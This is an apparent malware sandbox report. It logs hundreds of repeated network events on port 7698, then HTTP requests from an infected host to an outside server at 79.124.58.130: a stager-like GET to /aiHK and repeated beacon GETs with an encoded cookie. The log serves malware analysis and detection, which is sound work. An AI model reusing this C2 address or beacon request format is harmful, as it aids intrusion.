Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49866 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 49867 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 49868 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 49870 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49876 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49878 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 49880 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49881 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 49890 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49891 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49893 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49900
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 49903 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49903
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 49905 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49905
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49906
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49910
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49911
Source: unknown	Network traffic detected: HTTP traffic on port 49912 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49912
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 49917 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49917
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49921
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 49926 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 49927 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49927
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49930
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 7698
Source: unknown	Network traffic detected: HTTP traffic on port 7698 -> 49940

Source: global traffic

TCP traffic: 192.168.2.8:49705 -> 79.124.58.130:7698

Source: Joe Sandbox View

ASN Name: TAMATIYA-ASBG TAMATIYA-ASBG

Source: global traffic	HTTP traffic detected: GET /aiHK HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; msn OptimizedIE8;ENUS)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
